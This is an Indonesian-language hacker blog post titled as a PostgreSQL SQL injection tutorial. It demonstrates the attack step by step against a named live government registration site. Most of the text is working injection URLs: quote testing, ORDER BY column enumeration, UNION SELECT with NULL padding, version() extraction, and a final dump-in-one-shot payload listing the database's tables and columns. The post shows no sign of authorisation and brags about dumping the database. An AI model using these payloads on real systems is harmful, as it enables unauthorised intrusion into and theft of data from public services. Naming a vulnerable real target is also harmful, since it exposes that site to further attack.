Tutorial SQL Injection Postgresql

Danzz1337
Danzz1337
April 29, 2022

Assalamualaikum guysss, balik lagi ama gua Danzz 

Okee disini gua bakal ngasih tutorial SQL Postgre, langsung aja ke tutorial nya...

Buat Target nya : https://registrasi.magetan.go.id/zproject.php/account/email?satker=11

Pertama - tama kita cek web tersebut vuln apa ngga dengan menambahkan (')

https://registrasi.magetan.go.id/zproject.php/account/email?satker=11'

Nahh eror dan keterangannya postgre nii, oke lanjut ke order by nya

https://registrasi.magetan.go.id/zproject.php/account/email?satker=11'+order+by+1--+-

Nahh balik web nya seperti semula, dan kita cari column eror nya sampai berapa

https://registrasi.magetan.go.id/zproject.php/account/email?satker=11'+order+by+10--+- ~> aman

https://registrasi.magetan.go.id/zproject.php/account/email?satker=11'+order+by+30--+- ~> aman

https://registrasi.magetan.go.id/zproject.php/account/email?satker=11'+order+by+60--+- ~> eror

https://registrasi.magetan.go.id/zproject.php/account/email?satker=11'+order+by+59--+- ~> aman

Okee disini column nya cuma sampai 59, kita lanjut ke union+select

https://registrasi.magetan.go.id/zproject.php/account/email?satker=11'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59--+-

Lohh kok eror?nah berarti gabisa pakai angka gini jadi kita ganti pakai NULL 

https://registrasi.magetan.go.id/zproject.php/account/email?satker=11%27+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-

Nahh bisa kan tinggal kita cek deh null nya satu-satu pakai version()


Disini gua dapat di NULL ke 34

https://registrasi.magetan.go.id/zproject.php/account/email?satker=-11%27+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,version(),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-

Tinggal kita kasih dios nya aja deh

And boom ke dump deh db nya....

https://registrasi.magetan.go.id/zproject.php/account/email?satker=-11%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT+ARRAY_TO_STRING(ARRAY_AGG(concat(table_name,%27%3C~DanzzHaxor~%3E%27,column_name)::TEXT),$$%3Cli%3E$$)FROM+information_schema.columns+WHERE+table_schema+NOT+in($$informatio%E2%80%8Bn_schema$$,$$pg_catalog$$)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-

Okee sekian tutorial SQL Postgre dari gua semoga kalian paham sama penjelasan nya 

Wassalamualaikum...